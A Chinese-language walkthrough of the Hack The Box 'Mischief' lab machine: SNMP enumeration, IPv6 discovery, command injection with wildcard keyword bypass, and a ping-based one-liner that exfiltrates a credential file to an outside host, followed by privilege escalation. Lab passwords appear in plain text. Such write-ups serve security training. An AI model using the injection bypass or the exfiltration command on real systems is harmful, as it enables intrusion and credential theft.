Hack The Box Mischief WriteUp

1. 发现UDP 161 snmp服务开放:

nmap -T4 -v -sU -sV -p161 10.10.10.92

 2.利用snmp-check获取主机信息:

        Kali上的snmp-check需要注意两点,默认系统自带的snmp-check并不能直接使用,需要配合Ruby version >= 1.9.0 和 Ruby SNMP模块使用才能正常工作。如果还是不行,请从官网重新下载脚本,多重启几次系统,关闭代理再试试。

关键用户名密码 loki:godofmischiefisloki

        通过该密码可以登录3366端口获得以下信息。

3366端口页面

3.利用Enyx.py从snmp获取ipv6地址:

        从snmp信息中的iso串中自动提取ipv6地址 dead:beef:0000:0000:0250:56ff:feb0:58f8

./enyx.py 1 public 10.10.10.92

        利用浏览器访问该地址可获得如下页面,在浏览器中输入IPv6地址时要加 [ ]

用户名密码 administrator:trickeryanddeceit

        随后你可以获得一个明显的命令注入页面,需要绕过一些关键字拦截,读取位于home目录下的credential文件,可以有两种方法。一种是利用?通配符代替命令关键字如 /???/?s ,另一种是利用ping的外带数据读取文件内容,这种方式需要开启wireshark抓包后重组。命令为:cat ../../../../../home/loki/credential* | xxd -p -c 16 | while read exfil; do ping -p $exfil -c 1 10.10.10.10; done 

ssh loki:lokiisthebestnorsegod

4.登录并提权:

        利用 loki:lokiisthebestnorsegod 可以登录目标主机,cat .bash_history 可以发现另外一组密码

 操作记录

        在反弹回连阶段,主要的坑来自于防火墙限制了ipv4地址的回连,ifconfig先确定自己的ipv6地址,用python即可成功回连,获得的shell是wwwdata账户,这是一个sudo账户,利用刚获取的密码可以成功提权。

推荐阅读更多精彩内容